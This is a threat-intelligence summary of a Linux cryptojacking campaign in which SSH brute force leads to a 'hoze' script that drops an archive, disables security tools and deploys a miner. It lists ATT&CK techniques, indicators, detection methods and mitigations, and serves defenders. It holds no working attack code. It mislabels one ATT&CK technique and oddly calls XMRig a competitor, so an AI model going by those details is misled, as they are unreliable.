Full Report
The researchers observed a malicious IP address, previously flagged for conducting SSH brute force attempts, communicating with a malicious shell script named hoze. This script downloads xrx.tar, an archive that contains more scripts that uninstall security software and enable...
Analysis Summary
# Tool/Technique: Hoze Shell Script / Xrx.tar Payload
## Overview
This entry describes a multi-stage attack observed originating from a known malicious IP, starting with SSH brute force. The primary payload involves a shell script named `hoze` which downloads and executes an archive (`xrx.tar`) containing secondary scripts and configuration files aimed at disabling security measures and deploying a crypto-miner.
## Technical Details
- Type: Malware (Shell Scripts/Payload Dropper)
- Platform: Linux (Implied by SSH targeting)
- Capabilities: Initial access via brute force, defense evasion (uninstalling security software), persistence/execution enablement (setting executable permissions), C2 communication, and cryptomining deployment.
- First Seen: Unknown, but part of a campaign reported around September 2023.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1110 - Brute Force
- T1110.001 - Password Guessing: Valid Accounts
- **TA0005 - Defense Evasion**
- T1562 - Impair Defenses
- T1562.001 - Disable or Modify Tools
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter - (Shell Script functionality)
## Functionality
### Core Capabilities
- Initial access gained through SSH brute force attempts conducted by the associated malicious IP.
- **Defense Evasion:** Scripts deploy components that actively uninstall existing security software on the compromised system.
- **Execution Enablement:** Scripts modify file permissions (likely using `chmod +x`) to ensure subsequent malware components are executable.
### Advanced Features
- The deployment leverages an archive (`xrx.tar`) containing multiple scripts and a configuration file (`config.json`), indicating a structured, multi-file payload designed for specific post-exploitation tasks.
- **Resource Hijacking:** Deployment of a crypto-mining configuration file (`config.json`) strongly indicates the ultimate goal is cryptojacking.
## Indicators of Compromise
- File Hashes: N/A (Not provided in context)
- File Names: `hoze` (initial shell script), `xrx.tar` (archive), `config.json` (mining configuration)
- Registry Keys: N/A
- Network Indicators: Malicious IP address historically flagged for SSH brute force.
- Behavioral Indicators: Communication with the malicious IP, execution of shell scripts performing security software uninstallation, and setting executable permissions on dropped files.
## Associated Threat Actors
- Unknown/Unattributed specific group, but associated with an earlier CoinMiner campaign utilizing a similar public SSH key.
## Detection Methods
- **Signature-based detection:** Signatures targeting the specific file names (`hoze`, `xrx.tar`).
- **Behavioral detection:** Monitoring for login attempts against SSH (T1110), execution of scripts that call package managers to uninstall common security tools (e.g., `apt remove`, `yum remove`), or attempts to modify permissions broadly.
- **YARA rules:** Could be developed for known strings within the `config.json` related to XMRig or common mining parameters.
## Mitigation Strategies
- **Prevention measures:** Implement strong password policies for SSH accounts. Employ multi-factor authentication (MFA) where possible. Restrict SSH access via firewall rules to only trusted IP addresses.
- **Hardening recommendations:** Ensure SSH configurations limit login attempts and consider using key-based authentication exclusively. Regularly audit system services and installed software for unauthorized security tool removal.
## Related Tools/Techniques
- **XMRig:** (Implied competitor/related tool based on the purpose of the payload configuration file).
- **CoinMiner Campaigns:** Connection noted to a previous campaign targeting the same infrastructure type (Linux SSH servers).